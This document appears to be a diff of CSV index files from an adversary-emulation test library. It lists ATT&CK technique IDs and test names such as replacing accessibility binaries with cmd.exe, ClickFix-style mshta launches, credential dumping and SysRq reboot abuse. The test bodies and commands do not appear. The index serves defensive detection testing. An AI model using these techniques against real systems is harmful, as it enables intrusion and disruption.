 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -1004,6 +1010,7 @@ execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applic
 execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
 execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
 execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
+execution,T1204.002,User Execution: Malicious File,12,ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell,3f3120f0-7e50-4be2-88ae-54c61230cb9f,powershell
 execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
 execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
@@ -1299,6 +1306,8 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-s
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,6,Replace utilman.exe (Ease of Access Binary) with cmd.exe,1db380da-3422-481d-a3c8-6d5770dba580,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -1534,6 +1543,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypte
 collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
 collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell
 collection,T1560.001,Archive Collected Data: Archive via Utility,11,Compress a File for Exfiltration using Makecab,2a7bc405-9555-4f49-ace2-b2ae2941d629,command_prompt
+collection,T1560.001,Archive Collected Data: Archive via Utility,12,Copy and Compress AppData Folder,05e8942e-f04f-460a-b560-f7781257feec,powershell
 collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
@@ -1568,10 +1578,8 @@ collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShe
 collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
 collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
 collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
-collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
-collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
-collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
-collection,T1530,Data from Cloud Storage Object,4,Azure - Dump Azure Storage Account Objects via Azure CLI,67374845-b4c8-4204-adcc-9b217b65d4f1,powershell
+collection,T1530,Data from Cloud Storage Object,1,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
+collection,T1530,Data from Cloud Storage Object,2,Azure - Dump Azure Storage Account Objects via Azure CLI,67374845-b4c8-4204-adcc-9b217b65d4f1,powershell
 collection,T1005,Data from Local System,1,Search files of interest and save them to a single zip file (Windows),d3d9af44-b8ad-4375-8b0a-4bff4b7e419c,powershell
 collection,T1005,Data from Local System,2,Find and dump sqlite databases (Linux),00cbb875-7ae4-4cf1-b638-e543fd825300,bash
 collection,T1005,Data from Local System,3,Copy Apple Notes database files using AppleScript,cfb6d400-a269-4c06-a347-6d88d584d5f7,sh
@@ -1618,8 +1626,6 @@ lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,1,RDP to Dom
 lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,2,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
 lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
 lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,4,Disable NLA for RDP via Command Prompt,01d1c6c0-faf0-408e-b368-752a02285cb2,command_prompt
-lateral-movement,T1550.001,Use Alternate Authentication Material: Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
-lateral-movement,T1550.001,Use Alternate Authentication Material: Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
@@ -1784,7 +1790,8 @@ credential-access,T1552.001,Unsecured Credentials: Credentials In Files,14,List
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
-credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
+credential-access,T1528,Steal Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
+credential-access,T1528,Steal Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
 credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
@@ -1797,6 +1804,7 @@ credential-access,T1110.004,Brute Force: Credential Stuffing,4,Brute Force:Crede
 credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
 credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
 credential-access,T1187,Forced Authentication,3,Trigger an authenticated RPC call to a target server with no Sign flag set,81cfdd7f-1f41-4cc5-9845-bb5149438e37,powershell
+credential-access,T1555.006,Credentials from Password Stores: Cloud Secrets Management Stores,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",2,Access /etc/master.passwd (Local),5076874f-a8e6-4077-8ace-9e5ab54114a5,sh
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",3,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
@@ -2021,12 +2029,15 @@ discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery
 discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
 discovery,T1083,File and Directory Discovery,7,ESXi - Enumerate VMDKs available on an ESXi Host,4a233a40-caf7-4cf1-890a-c6331bbc72cf,command_prompt
+discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
 discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
 discovery,T1619,Cloud Storage Object Discovery,2,Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI,070322a4-2c60-4c50-8ffb-c450a34fe7bf,powershell
+discovery,T1619,Cloud Storage Object Discovery,3,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
+discovery,T1619,Cloud Storage Object Discovery,4,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
 discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell
 discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
@@ -2145,9 +2156,11 @@ impact,T1489,Service Stop,4,Linux - Stop service using systemctl,42e3a5bd-1e45-4
 impact,T1489,Service Stop,5,Linux - Stop service by killing process using killall,e5d95be6-02ee-4ff1-aebe-cf86013b6189,sh
 impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,332f4c76-7e96-41a6-8cc2-7361c49db8be,sh
 impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
+impact,T1489,Service Stop,8,Abuse of linux magic system request key for Send a SIGTERM to all processes,6e76f56f-2373-4a6c-a63f-98b7b72761f1,bash
 impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
 impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
 impact,T1491.001,Defacement: Internal Defacement,3,ESXi - Change Welcome Message on Direct Console User Interface (DCUI),30905f21-34f3-4504-8b4c-f7a5e314b810,command_prompt
+impact,T1491.001,Defacement: Internal Defacement,4,Windows - Display a simulated ransom note via Notepad (non-destructive),0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5,powershell
 impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
 impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
@@ -2199,6 +2212,7 @@ impact,T1529,System Shutdown/Reboot,12,Logoff System - Windows,3d8c25b5-7ff5-4c9
 impact,T1529,System Shutdown/Reboot,13,ESXi - Terminates VMs using pkill,987c9b4d-a637-42db-b1cb-e9e242c3991b,command_prompt
 impact,T1529,System Shutdown/Reboot,14,ESXi - Avoslocker enumerates VMs and forcefully kills VMs,189f7d6e-9442-4160-9bc3-5e4104d93ece,command_prompt
 impact,T1529,System Shutdown/Reboot,15,ESXi - vim-cmd Used to Power Off VMs,622cc1a0-45e7-428c-aed7-c96dd605fbe6,command_prompt
+impact,T1529,System Shutdown/Reboot,16,Abuse of Linux Magic System Request Key for Reboot,d2a1f4bc-a064-4223-8281-a086dce5423c,bash
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1566.002,Phishing: Spearphishing Link,1,Paste and run technique,bc177ef9-6a12-4ebc-a2ec-d41e19c2791d,powershell
 initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
@@ -16,6 +16,8 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",12,Chmod through c script (freebsd),da40b5fe-3098-4b3b-a410-ff177e49ee2e,sh
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh
+defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
+defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
 defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
@@ -26,7 +28,7 @@ defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Cachi
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
-defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
+defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
@@ -123,6 +125,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagg
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Disable Account Lockout Policy via PowerCLI,091a6290-cd29-41cb-81ea-b12f133c66cb,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,59,Disable ASLR Via sysctl parameters - Linux,ac333fe1-ce2b-400b-a117-538634427439,bash
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
@@ -365,6 +368,7 @@ discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
+discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
 discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
@@ -423,6 +427,7 @@ impact,T1489,Service Stop,4,Linux - Stop service using systemctl,42e3a5bd-1e45-4
 impact,T1489,Service Stop,5,Linux - Stop service by killing process using killall,e5d95be6-02ee-4ff1-aebe-cf86013b6189,sh
 impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,332f4c76-7e96-41a6-8cc2-7361c49db8be,sh
 impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
+impact,T1489,Service Stop,8,Abuse of linux magic system request key for Send a SIGTERM to all processes,6e76f56f-2373-4a6c-a63f-98b7b72761f1,bash
 impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
 impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (FreeBSD/Linux),7b8ce084-3922-4618-8d22-95f996173765,sh
 impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (FreeBSD/Linux),53e6735a-4727-44cc-b35b-237682a151ad,sh
@@ -439,6 +444,7 @@ impact,T1529,System Shutdown/Reboot,8,Reboot System via `halt` - Linux,78f92e14-
 impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,sh
 impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
 impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
+impact,T1529,System Shutdown/Reboot,16,Abuse of Linux Magic System Request Key for Reboot,d2a1f4bc-a064-4223-8281-a086dce5423c,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
@@ -10,10 +10,12 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",11,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
+defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
+defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
-defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
+defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
@@ -18,6 +18,8 @@ defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,15,Rundll32 ex
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,16,Rundll32 execute payload by calling RouteTheCall,8a7f56ee-10e7-444c-a139-0109438288eb,powershell
 defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
+defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
+defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
 defense-evasion,T1036.007,Masquerading: Double File Extension,1,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
@@ -50,6 +52,7 @@ defense-evasion,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wp
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
+defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,3,Masquerading cmd.exe as VEDetector.exe,03ae82a6-9fa0-465b-91df-124d8ca5c4e8,powershell
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
 defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
@@ -102,6 +105,7 @@ defense-evasion,T1202,Indirect Command Execution,4,Indirect Command Execution -
 defense-evasion,T1202,Indirect Command Execution,5,Indirect Command Execution - RunMRU Dialog,de323a93-2f18-4bd5-ba60-d6fca6aeff76,powershell
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,11,Expand CAB with expand.exe,9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11,command_prompt
 defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
 defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
@@ -376,6 +380,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable Ev
